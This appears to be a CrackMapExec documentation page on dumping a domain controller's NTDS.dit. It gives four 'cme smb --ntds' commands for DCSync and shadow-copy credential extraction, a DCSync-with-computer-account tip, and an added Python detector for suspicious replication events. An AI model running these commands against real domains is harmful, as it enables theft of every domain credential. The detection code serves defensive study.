
Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin privileges on the target Domain Controller.
Two methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resultant linked-lists into a readable format
vss - Uses the Volume Shadow Copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSYNC with the computer account of the DC
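The drsuapi method and the computer-account note above both surface on the DC as directory replication requests, so the following is an added detection example (not part of the original page or of CrackMapExec). It assumes Directory Service Access auditing is enabled, that events 4662 and 4624 have been exported as dictionaries with the simplified fields shown, and that `DC_IPS` is your own inventory of domain controller addresses; the function name and sample data are constructed.

```python
# Added example. Replication extended-right GUIDs (AD schema values).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

def find_suspect_replication(events, dc_ips):
    """Return sorted (account, source_ip) pairs for replication requests
    whose logon session did not originate from a known DC address."""
    # Logon session id -> source address, taken from 4624 logon events.
    session_ip = {e["TargetLogonId"]: e.get("IpAddress", "unknown")
                  for e in events if e["EventID"] == 4624}
    hits = set()
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = e.get("Properties", "").lower()
        if not any(guid in props for guid in REPL_GUIDS):
            continue
        # No exemption for names ending in '$': a DC computer account seen
        # from a non-DC address is the case a name-based filter would miss.
        ip = session_ip.get(e["SubjectLogonId"], "unknown")
        if ip not in dc_ips:
            hits.add((e["SubjectUserName"], ip))
    return sorted(hits)

# Constructed sample data: simplified event fields, illustrative addresses.
DC_IPS = {"192.168.1.100", "192.168.1.101"}
GET_ALL = "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"
OTHER = "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"  # unrelated property
SAMPLE = [
    {"EventID": 4624, "TargetUserName": "DC02$", "TargetLogonId": "0x1a", "IpAddress": "192.168.1.101"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x1a", "Properties": GET_ALL},
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x2b", "IpAddress": "192.168.1.50"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x2b", "Properties": GET_ALL},
    {"EventID": 4624, "TargetUserName": "admin", "TargetLogonId": "0x3c", "IpAddress": "192.168.1.50"},
    {"EventID": 4662, "SubjectUserName": "admin", "SubjectLogonId": "0x3c", "Properties": GET_ALL},
    {"EventID": 4662, "SubjectUserName": "admin", "SubjectLogonId": "0x3c", "Properties": OTHER},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x4d", "Properties": GET_ALL},
]

if __name__ == "__main__":
    for account, ip in find_suspect_replication(SAMPLE, DC_IPS):
        print(f"replication request by {account} from {ip}")
```

Legitimate DC-to-DC replication (DC02$ from a listed DC address) is not reported, while the same kind of request from an unlisted address is, whichever account made it.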
Remember to play this music every time you get DA